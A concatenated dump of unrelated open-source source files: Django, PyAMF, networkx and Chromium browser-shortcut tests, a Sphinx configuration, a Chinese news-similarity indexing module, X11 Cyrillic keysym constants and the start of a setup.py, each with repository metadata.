s.save(update_fields=['first_name'])
with self.assertRaises(ValueError):
s.save(update_fields="name")
def test_empty_update_fields(self):
s = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
# Save is skipped.
with self.assertNumQueries(0):
s.save(update_fields=[])
# Signals were skipped, too...
self.assertEqual(len(pre_save_data), 0)
self.assertEqual(len(post_save_data), 0)
pre_save.disconnect(pre_save_receiver)
post_save.disconnect(post_save_receiver)
def test_num_queries_inheritance(self):
s = Employee.objects.create(name='Sara', gender='F')
s.employee_num = 1
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['employee_num'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.employee_num, 1)
self.assertEqual(s.name, 'Sara')
s.employee_num = 2
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['name'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.name, 'Emily')
self.assertEqual(s.employee_num, 1)
# A little sanity check that we actually did updates...
self.assertEqual(Employee.objects.count(), 1)
self.assertEqual(Person.objects.count(), 1)
with self.assertNumQueries(2):
s.save(update_fields=['name', 'employee_num'])
|
bsd-3-clause
|
SpiderLabs/deblaze
|
pyamf/pyamf/tests/modules/test_decimal.py
|
2
|
1030
|
# Copyright (c) 2007-2009 The PyAMF Project.
# See LICENSE for details.
"""
Tests for the C{decimal} module integration.
"""
import unittest
import decimal
import pyamf
class DecimalTestCase(unittest.TestCase):
def test_amf0_encode(self):
x = decimal.Decimal('1.23456463452345')
self.assertEquals(pyamf.encode(x, encoding=pyamf.AMF0, strict=False).getvalue(),
'\x00?\xf3\xc0\xc6\xd8\xa18\xfa')
self.assertRaises(pyamf.EncodeError, pyamf.encode, x, encoding=pyamf.AMF0, strict=True)
def test_amf3_encode(self):
x = decimal.Decimal('1.23456463452345')
self.assertEquals(pyamf.encode(x, encoding=pyamf.AMF3, strict=False).getvalue(),
'\x05?\xf3\xc0\xc6\xd8\xa18\xfa')
self.assertRaises(pyamf.EncodeError, pyamf.encode, x, encoding=pyamf.AMF3, strict=True)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DecimalTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
gpl-3.0
|
DougFirErickson/qgisSpaceSyntaxToolkit
|
esstoolkit/external/networkx/algorithms/link_analysis/tests/test_hits.py
|
79
|
2544
|
#!/usr/bin/env python
from nose.tools import *
from nose import SkipTest
from nose.plugins.attrib import attr
import networkx
# Example from
# A. Langville and C. Meyer, "A survey of eigenvector methods of web
# information retrieval." http://citeseer.ist.psu.edu/713792.html
class TestHITS:
def setUp(self):
G=networkx.DiGraph()
edges=[(1,3),(1,5),\
(2,1),\
(3,5),\
(5,4),(5,3),\
(6,5)]
G.add_edges_from(edges,weight=1)
self.G=G
self.G.a=dict(zip(G,[0.000000, 0.000000, 0.366025,
0.133975, 0.500000, 0.000000]))
self.G.h=dict(zip(G,[ 0.366025, 0.000000, 0.211325,
0.000000, 0.211325, 0.211325]))
def test_hits(self):
G=self.G
h,a=networkx.hits(G,tol=1.e-08)
for n in G:
assert_almost_equal(h[n],G.h[n],places=4)
for n in G:
assert_almost_equal(a[n],G.a[n],places=4)
def test_hits_nstart(self):
G = self.G
nstart = dict([(i, 1./2) for i in G])
h, a = networkx.hits(G, nstart = nstart)
@attr('numpy')
def test_hits_numpy(self):
try:
import numpy as np
except ImportError:
raise SkipTest('NumPy not available.')
G=self.G
h,a=networkx.hits_numpy(G)
for n in G:
assert_almost_equal(h[n],G.h[n],places=4)
for n in G:
assert_almost_equal(a[n],G.a[n],places=4)
def test_hits_scipy(self):
try:
import scipy as sp
except ImportError:
raise SkipTest('SciPy not available.')
G=self.G
h,a=networkx.hits_scipy(G,tol=1.e-08)
for n in G:
assert_almost_equal(h[n],G.h[n],places=4)
for n in G:
assert_almost_equal(a[n],G.a[n],places=4)
@attr('numpy')
def test_empty(self):
try:
import numpy
except ImportError:
raise SkipTest('numpy not available.')
G=networkx.Graph()
assert_equal(networkx.hits(G),({},{}))
assert_equal(networkx.hits_numpy(G),({},{}))
assert_equal(networkx.authority_matrix(G).shape,(0,0))
assert_equal(networkx.hub_matrix(G).shape,(0,0))
def test_empty_scipy(self):
try:
import scipy
except ImportError:
raise SkipTest('scipy not available.')
G=networkx.Graph()
assert_equal(networkx.hits_scipy(G),({},{}))
|
gpl-3.0
|
tailhook/quire
|
doc/conf.py
|
1
|
7731
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Quire documentation build configuration file, created by
# sphinx-quickstart on Wed Oct 16 19:11:54 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Quire'
copyright = '2013, Paul Colomiets'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.0'
# The full version, including alpha/beta/rc tags.
release = '2.0-beta1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Quiredoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Quire.tex', 'Quire Documentation',
'Paul Colomiets', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'quire', 'Quire Documentation',
['Paul Colomiets'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Quire', 'Quire Documentation',
'Paul Colomiets', 'Quire', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
mit
|
meego-tablet-ux/meego-app-browser
|
chrome/test/functional/shortcuts.py
|
3
|
8091
|
#!/usr/bin/python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import pyauto_functional
import pyauto
class ShortcutsTest(pyauto.PyUITest):
"""Test for browser shortcuts.
No tests for print, save page as... shortcuts as they involve interaction
with OS native dialogs.
"""
def testNewTabShortcut(self):
"""Verify new tab shortcut."""
self.RunCommand(pyauto.IDC_NEW_TAB)
self.assertEqual(2, self.GetTabCount(), msg='Can not open a new tab.')
def testCloseTabShortcut(self):
"""Verify close tab shortcut."""
self.RunCommand(pyauto.IDC_NEW_TAB)
self.assertEqual(2, self.GetTabCount(), msg='Can not open a new tab.')
self.RunCommand(pyauto.IDC_CLOSE_TAB)
self.assertEqual(1, self.GetTabCount(), msg='Can not close a tab.')
def testReopenClosedTabShortcut(self):
"""Verify reopen closed tab shortcut opens recently closed tab."""
self.RunCommand(pyauto.IDC_NEW_TAB)
url = self.GetFileURLForPath(os.path.join(self.DataDir(), 'title2.html'))
self.NavigateToURL(url)
title = self.GetActiveTabTitle()
self.GetBrowserWindow(0).GetTab(1).Close()
self.assertEqual(1, self.GetTabCount(), msg='Can not close a tab.')
# Verify shortcut reopens the correct tab.
self.RunCommand(pyauto.IDC_RESTORE_TAB)
self.assertEqual(2, self.GetTabCount(), msg='Can not restore a tab.')
self.assertEqual(title, self.GetActiveTabTitle())
def testNewWindowShortcut(self):
"""Verify new window shortcut."""
self.RunCommand(pyauto.IDC_NEW_WINDOW)
self.assertEquals(2, self.GetBrowserWindowCount())
def testNewIncognitoWindowShortcut(self):
"""Verify new incognito window shortcut launches incognito window."""
self.RunCommand(pyauto.IDC_NEW_INCOGNITO_WINDOW)
self.assertEqual(2, self.GetBrowserWindowCount())
# Check if it is incognito by checking history.
assert not self.GetHistoryInfo().History(), 'Expecting clean history.'
url = self.GetFileURLForPath(os.path.join(self.DataDir(), 'title2.html'))
self.NavigateToURL(url, 1, 0)
self.assertEqual(0, len(self.GetHistoryInfo().History()))
def testCloseWindowShortcut(self):
"""Verify close window shortcut."""
self.RunCommand(pyauto.IDC_NEW_WINDOW)
self.assertEquals(2, self.GetBrowserWindowCount())
self.RunCommand(pyauto.IDC_CLOSE_WINDOW)
self.assertEquals(1, self.GetBrowserWindowCount())
def testFindShortcut(self):
"""Verify find in box shortcut."""
self.ApplyAccelerator(pyauto.IDC_FIND)
self.assertTrue(self.WaitUntil(lambda: self.IsFindInPageVisible()),
msg='Find in box is not visible.')
def testAlwaysShowBookmarksBarShortcut(self):
"""Verify always show bookmarks bar shortcut."""
# Show bookmark bar.
self.ApplyAccelerator(pyauto.IDC_SHOW_BOOKMARK_BAR)
self.assertTrue(self.WaitUntil(lambda: self.GetBookmarkBarVisibility()),
msg='Bookmarks bar is not visible.')
# Hide bookmark bar.
self.ApplyAccelerator(pyauto.IDC_SHOW_BOOKMARK_BAR)
self.assertTrue(self.WaitUntil(lambda:
self.GetBookmarkBarVisibility() is False),
msg='Bookmarks bar is visible.')
# TODO: Task Manager Shortcut. crbug.com/73454
def testClearBrowsingDataShortcut(self):
"""Verify clear browsing data shortcut."""
self.ApplyAccelerator(pyauto.IDC_CLEAR_BROWSING_DATA)
self.assertEquals(2, self.GetTabCount())
self.assertTrue(re.search('clearBrowserData',
self.GetActiveTabURL().spec()), 'Clear browsing data url is wrong.')
# Wait until the clear browsing data DOM UI window opens.
self.assertTrue(self.WaitUntil(lambda:
self.ExecuteJavascript(
'var element = document.getElementById("clearBrowserDataOverlay");'
'if(element) window.domAutomationController.send(element.nodeName);'
'else window.domAutomationController.send(0)', 0, 1),
expect_retval='DIV'), msg='Could not find the DOM UI window element.')
def testViewSourceShortcut(self):
"""Verify view source shortcut."""
self.ApplyAccelerator(pyauto.IDC_VIEW_SOURCE)
self.assertEqual(2, self.GetTabCount(), msg='Cannot View Source.')
self.assertEqual('view-source:about:blank', self.GetActiveTabURL().spec(),
msg='View Source URL is not correct.')
def testDeveloperToolsShortcut(self):
"""Verify developer tools shortcut opens developer tools window.."""
# Setting the pref to undock devtools so that it can be seen
# as a separate window.
self.SetPrefs(pyauto.kDevToolsOpenDocked, False)
self.ApplyAccelerator(pyauto.IDC_DEV_TOOLS)
self.assertEqual(2, self.GetBrowserWindowCount(),
msg='DevTools window is not open.')
def testJavaScriptConsoleShortcut(self):
"""Verify javascript console shortcut opens developer tools window.
We can not check if console is open or not.
We are making sure at least the shortcut launches developer tools window.
"""
# Setting the pref to undock devtools so that it can be seen
# as a separate window.
self.SetPrefs(pyauto.kDevToolsOpenDocked, False)
self.ApplyAccelerator(pyauto.IDC_DEV_TOOLS_CONSOLE)
self.assertEqual(2, self.GetBrowserWindowCount(),
msg='DevTools window is not open.')
def testHistoryShortcut(self):
"""Verify history shortcut opens history page."""
self.RunCommand(pyauto.IDC_SHOW_HISTORY)
self.assertEqual('History', self.GetActiveTabTitle(),
msg='History page was not opened.')
def testDownloadsShortcut(self):
"""Verify downloads shortcut opens downloads page."""
self.RunCommand(pyauto.IDC_SHOW_DOWNLOADS)
self.assertEqual('Downloads', self.GetActiveTabTitle(),
msg='Downloads page was not opened.')
def testHelpShortcut(self):
"""Verify help shortcut opens help page."""
self.ApplyAccelerator(pyauto.IDC_HELP_PAGE)
help_page_title = 'Google Chrome Help'
if self.IsChromeOS():
help_page_title = 'Chrome OS Help'
self.assertTrue(self.WaitUntil(lambda: self.GetActiveTabTitle(),
expect_retval=help_page_title),
msg='Google Chrome help page has not opened.')
def testSwitchingTabsShortcuts(self):
"""Verify switching tabs shortcuts."""
url1 = self.GetFileURLForDataPath('title1.html')
url2 = self.GetFileURLForDataPath('title2.html')
url3 = self.GetFileURLForDataPath('title3.html')
titles = ['title1.html', 'Title Of Awesomeness',
'Title Of More Awesomeness']
for eachurl in [url1, url2, url3]:
self.AppendTab(pyauto.GURL(eachurl))
# Switch to second tab.
self.ApplyAccelerator(pyauto.IDC_SELECT_TAB_1)
self.assertEqual(titles[0], self.GetActiveTabTitle())
# Switch to last tab.
self.ApplyAccelerator(pyauto.IDC_SELECT_LAST_TAB)
self.assertEqual(titles[2], self.GetActiveTabTitle())
# Switch to previous tab.
for x in range(len(titles)-1, -1, -1):
self.assertEquals(titles[x], self.GetActiveTabTitle())
self.RunCommand(pyauto.IDC_SELECT_PREVIOUS_TAB)
# Switch to next tab.
for x in range(0, len(titles)):
self.RunCommand(pyauto.IDC_SELECT_NEXT_TAB)
self.assertEquals(titles[x], self.GetActiveTabTitle())
def testNavigationShortcuts(self):
"""Verify back and forward navigation shortcuts from browsing history."""
url1 = self.GetFileURLForDataPath('title2.html')
url2 = self.GetFileURLForDataPath('title3.html')
for url in [url1, url2]:
self.NavigateToURL(url)
# Verify backward navigation.
self.RunCommand(pyauto.IDC_BACK)
self.assertEquals('Title Of Awesomeness', self.GetActiveTabTitle())
# Verify forward navigation.
self.RunCommand(pyauto.IDC_FORWARD)
self.assertEquals('Title Of More Awesomeness', self.GetActiveTabTitle())
# TODO: Open homepage shortcut. crbug.com/74103
if __name__ == '__main__':
pyauto_functional.Main()
|
bsd-3-clause
|
Google1234/Information_retrieva_Projectl-
|
similar_doc.py
|
1
|
11809
|
#-*- coding: UTF-8 -*-
import jieba
import config
import News_Recommend
path="data/netease"
class read_block:
def __init__(self,buff_size,filename):
self.size=buff_size
self.filename=open(filename,'r')
self.buff=self.filename.read(self.size)
self.pointer=0
if ord(self.buff[0])==0xEF and ord(self.buff[1])==0xBB and ord(self.buff[2])==0xbf : #####解决BOM问题
self.last_pointer=3
else:
self.last_pointer=0
self.base_pointer=0
def read(self):
if self.last_pointer==0:
print "Error! :self.size is too small !self.buff is full,can not load new data!"
a=self.buff[self.last_pointer:]+self.filename.read(self.last_pointer)
del self.buff
self.buff=a
self.pointer-=self.last_pointer
self.base_pointer+=self.last_pointer
self.base_offset-=self.last_pointer
self.last_pointer=0
def pop_token(self):
'''
返回 词项倒排记录相关值
:return: word_id 文档号
pointer 指针 数值型
length 包括末尾的'#####' 数值型
'''
self.base_offset=self.last_pointer
while True:#doc_id
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
return -1,0,0 #表示文档读完
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
doc_id=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
while True:#title
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
return -1,0,0 #表示文档读完
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
#title=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
while True:#content
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
return -1,0,0 #表示文档读完
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
#content=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
while True:#url
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
return -1,0,0 #表示文档读完
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
#doc_id=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
return doc_id,self.base_pointer+self.base_offset,self.pointer-self.base_offset
def pop_rest(self):
a=self.buff[self.last_pointer:]+self.filename.read(self.last_pointer)
del self.buff
self.buff=a
self.pointer=self.last_pointer=self.size
return self.buff
def close(self):
self.filename.close()
del self.pointer,self.last_pointer,self.size,self.buff,self.base_pointer
class write_block:
def __init__(self,buff_size,filename):
self.remain=self.size=buff_size
self.filename=filename
file=open(self.filename,'w')
file.close()
self.buff=''
def push(self,content):
if len(content)>self.remain:
self.buff+=content[:self.remain+1]
file=open(self.filename,'a')
file.write(self.buff)
file.close()
del self.buff
self.buff=''
self.buff+=content[self.remain+1:]
self.remain=self.size -(len(content)-self.remain)
else:
self.buff+=content
self.remain-=len(content)
def close(self):
file=open(self.filename,'a')
file.write(self.buff)
file.close()
del self.buff
self.buff=''
self.remain=self.size
def establish_document_index(input_file,buff_size,output_file):
'''
:param input_file: 网页爬取文件
:param buff_size: 读写文件块的大小
:param output_file: 文档号:对应此文档号的记录在文件中位置指针:此项文档占用字节数|
注:起始位置为词项对应的以一个doc_id位置 绝对地址
所占字节数 从第一个doc_id存储位置至 最后一个url存储完位置止,而不是最后的'#####' 绝对地址
:return:
'''
print "process:establish document index ----->Begin"
block_read=read_block(buff_size,input_file)
block_write=write_block(buff_size,output_file)
while True:
doc_id,pointer,length=block_read.pop_token()
if doc_id==-1:
break
block_write.push(doc_id+':'+str(pointer)+':'+str(length)+'|')
block_read.close()
block_write.close()
del block_read
del block_write
print "process:establish docunment index ----->Finish"
class doc_id_index:
dic={}
def __init__(self,index_filename,data_filename,cache_size):
file=open(index_filename,'r')
self.index_file=open(data_filename,'r')
buff=file.read()
pointer=last_pointer=0
if ord(buff[0])==0xEF and ord(buff[1])==0xBB and ord(buff[2])==0xbf : #####解决BOM问题
pointer=last_pointer=3
while True:
if pointer==len(buff)-1:
break
#doc_id
while True:
if buff[pointer]==':':
break
pointer+=1
doc_id=buff[last_pointer:pointer]
last_pointer=pointer+1
#doc_pointer
pointer+=1
while True:
if buff[pointer]==':':
break
pointer+=1
doc_pointer=buff[last_pointer:pointer]
last_pointer=pointer+1
#length
pointer+=1
while True:
if buff[pointer]=='|':
break
pointer+=1
length=buff[last_pointer:pointer]
last_pointer=pointer+1
self.dic[int(doc_id)]=[int(doc_pointer),int(length)]
file.close()
self.cache_size=cache_size
del buff,last_pointer,pointer,cache_size,doc_id,doc_pointer,length
#第一次加载网页文件
self.cache=self.index_file.read(self.cache_size)
self.cache_pointer=0
def get_location(self,doc_id):#pointer,doc_id_length,title_length,content_length,url_length
if self.dic.has_key(doc_id):
return self.dic[doc_id][0],self.dic[doc_id][1]
else:
print "Warning:doc_id not exist! Ignore",doc_id
return -1,0
def get_data(self,doc_id):
begin_location,length=self.get_location(doc_id)
if begin_location==-1:
return '','','' #title content url
if begin_location>=self.cache_pointer and begin_location+length<=self.cache_pointer+self.cache_size:
#从内存中找
pass
else:
#从磁盘中读
if length>self.cache_size:
print "Error:cache too small!can not load data"
return '','',''
else:
del self.cache
self.index_file.seek(begin_location,0)
self.cache=self.index_file.read(self.cache_size)
self.cache_pointer=begin_location
pointer=last_pointer=begin_location-self.cache_pointer
while True:#doc_id
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
doc_id=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
while True:#title
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
title=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
while True:#content
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
content=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
while True:#url
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
url=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
return title,content,url
def close(self):
del self.cache,self.cache_size,self.cache_pointer
self.index_file.close()
class similar:
def __init__(self,index_filename,data_filename,dic_filename,inverted_index_filename,cache_size,doc_total_numbers=100000):
self.FastCos=News_Recommend.FastCosineScore(dic_filename,inverted_index_filename,cache_size,path[:-7]+config.stopword_filename,doc_total_numbers)
self.index=doc_id_index(index_filename,data_filename,cache_size)
self.punct = set(u'''/+%#:!),.:;?]}¢'"、。〉》」』】〕〗〞︰︱︳﹐、﹒
﹔﹕﹖﹗﹚﹜﹞!),.:;?|}︴︶︸︺︼︾﹀﹂﹄﹏、~¢
々‖•·ˇˉ―--′’”([{£¥'"‵〈《「『【〔〖([{£¥〝︵︷︹︻
︽︿﹁﹃﹙﹛﹝({“‘-—_…''')
self.Letters_and_numbers=set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
#读停用词文件
self.stopword={}
buff=open(path[:-7]+config.stopword_filename,'r').read()
pointer=lastpointer=0
while pointer<len(buff):
while buff[pointer]!='\n':
pointer+=1
self.stopword[buff[lastpointer:pointer]]=1
lastpointer=pointer+1
pointer+=1
del buff,lastpointer,pointer
def calculate(self,doc_id,Top_numbers=10,multiple=10):
title,content,url=self.index.get_data(doc_id)
cut=jieba.cut_for_search(content)
word_list=[]
for word in cut:
if word not in self.punct and word not in self.Letters_and_numbers :
#计算文档间相似度,必须去停用词,否则太慢
if self.stopword.has_key(word.encode("utf-8")):
pass
else:
word_list.append(word.encode("utf-8"))
return self.FastCos.calculate(word_list,Top_numbers,multiple)
def write_to_file(self,total_doc_numbers,filename):
print "process :calculate similar files +store into file---->>>>"
block_write=write_block(config.buff_size,filename)
for id in range(1,total_doc_numbers):
TopK=self.calculate(id,config.recommand_numbers)
block_write.push(str(id))
for j in TopK :
if j!=id:#返回的数目=config.recommand_numbers+1,返回最相似的文档号可能是文档自身
block_write.push(':'+str(j))
block_write.push('|')
print id
block_write.close()
del block_write
print "process :caiculate similar files +store into file---->>>>Finish"
def close(self):
del self.FastCos,self.index,self.punct,self.Letters_and_numbers
|
mit
|
python-xlib/python-xlib
|
Xlib/keysymdef/cyrillic.py
|
14
|
2540
|
XK_Serbian_dje = 0x6a1
XK_Macedonia_gje = 0x6a2
XK_Cyrillic_io = 0x6a3
XK_Ukrainian_ie = 0x6a4
XK_Ukranian_je = 0x6a4
XK_Macedonia_dse = 0x6a5
XK_Ukrainian_i = 0x6a6
XK_Ukranian_i = 0x6a6
XK_Ukrainian_yi = 0x6a7
XK_Ukranian_yi = 0x6a7
XK_Cyrillic_je = 0x6a8
XK_Serbian_je = 0x6a8
XK_Cyrillic_lje = 0x6a9
XK_Serbian_lje = 0x6a9
XK_Cyrillic_nje = 0x6aa
XK_Serbian_nje = 0x6aa
XK_Serbian_tshe = 0x6ab
XK_Macedonia_kje = 0x6ac
XK_Byelorussian_shortu = 0x6ae
XK_Cyrillic_dzhe = 0x6af
XK_Serbian_dze = 0x6af
XK_numerosign = 0x6b0
XK_Serbian_DJE = 0x6b1
XK_Macedonia_GJE = 0x6b2
XK_Cyrillic_IO = 0x6b3
XK_Ukrainian_IE = 0x6b4
XK_Ukranian_JE = 0x6b4
XK_Macedonia_DSE = 0x6b5
XK_Ukrainian_I = 0x6b6
XK_Ukranian_I = 0x6b6
XK_Ukrainian_YI = 0x6b7
XK_Ukranian_YI = 0x6b7
XK_Cyrillic_JE = 0x6b8
XK_Serbian_JE = 0x6b8
XK_Cyrillic_LJE = 0x6b9
XK_Serbian_LJE = 0x6b9
XK_Cyrillic_NJE = 0x6ba
XK_Serbian_NJE = 0x6ba
XK_Serbian_TSHE = 0x6bb
XK_Macedonia_KJE = 0x6bc
XK_Byelorussian_SHORTU = 0x6be
XK_Cyrillic_DZHE = 0x6bf
XK_Serbian_DZE = 0x6bf
XK_Cyrillic_yu = 0x6c0
XK_Cyrillic_a = 0x6c1
XK_Cyrillic_be = 0x6c2
XK_Cyrillic_tse = 0x6c3
XK_Cyrillic_de = 0x6c4
XK_Cyrillic_ie = 0x6c5
XK_Cyrillic_ef = 0x6c6
XK_Cyrillic_ghe = 0x6c7
XK_Cyrillic_ha = 0x6c8
XK_Cyrillic_i = 0x6c9
XK_Cyrillic_shorti = 0x6ca
XK_Cyrillic_ka = 0x6cb
XK_Cyrillic_el = 0x6cc
XK_Cyrillic_em = 0x6cd
XK_Cyrillic_en = 0x6ce
XK_Cyrillic_o = 0x6cf
XK_Cyrillic_pe = 0x6d0
XK_Cyrillic_ya = 0x6d1
XK_Cyrillic_er = 0x6d2
XK_Cyrillic_es = 0x6d3
XK_Cyrillic_te = 0x6d4
XK_Cyrillic_u = 0x6d5
XK_Cyrillic_zhe = 0x6d6
XK_Cyrillic_ve = 0x6d7
XK_Cyrillic_softsign = 0x6d8
XK_Cyrillic_yeru = 0x6d9
XK_Cyrillic_ze = 0x6da
XK_Cyrillic_sha = 0x6db
XK_Cyrillic_e = 0x6dc
XK_Cyrillic_shcha = 0x6dd
XK_Cyrillic_che = 0x6de
XK_Cyrillic_hardsign = 0x6df
XK_Cyrillic_YU = 0x6e0
XK_Cyrillic_A = 0x6e1
XK_Cyrillic_BE = 0x6e2
XK_Cyrillic_TSE = 0x6e3
XK_Cyrillic_DE = 0x6e4
XK_Cyrillic_IE = 0x6e5
XK_Cyrillic_EF = 0x6e6
XK_Cyrillic_GHE = 0x6e7
XK_Cyrillic_HA = 0x6e8
XK_Cyrillic_I = 0x6e9
XK_Cyrillic_SHORTI = 0x6ea
XK_Cyrillic_KA = 0x6eb
XK_Cyrillic_EL = 0x6ec
XK_Cyrillic_EM = 0x6ed
XK_Cyrillic_EN = 0x6ee
XK_Cyrillic_O = 0x6ef
XK_Cyrillic_PE = 0x6f0
XK_Cyrillic_YA = 0x6f1
XK_Cyrillic_ER = 0x6f2
XK_Cyrillic_ES = 0x6f3
XK_Cyrillic_TE = 0x6f4
XK_Cyrillic_U = 0x6f5
XK_Cyrillic_ZHE = 0x6f6
XK_Cyrillic_VE = 0x6f7
XK_Cyrillic_SOFTSIGN = 0x6f8
XK_Cyrillic_YERU = 0x6f9
XK_Cyrillic_ZE = 0x6fa
XK_Cyrillic_SHA = 0x6fb
XK_Cyrillic_E = 0x6fc
XK_Cyrillic_SHCHA = 0x6fd
XK_Cyrillic_CHE = 0x6fe
XK_Cyrillic_HARDSIGN = 0x6ff
|
lgpl-2.1
|
vinayan3/scrapy-statsd
|
setup.py
|
1
|
1505
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
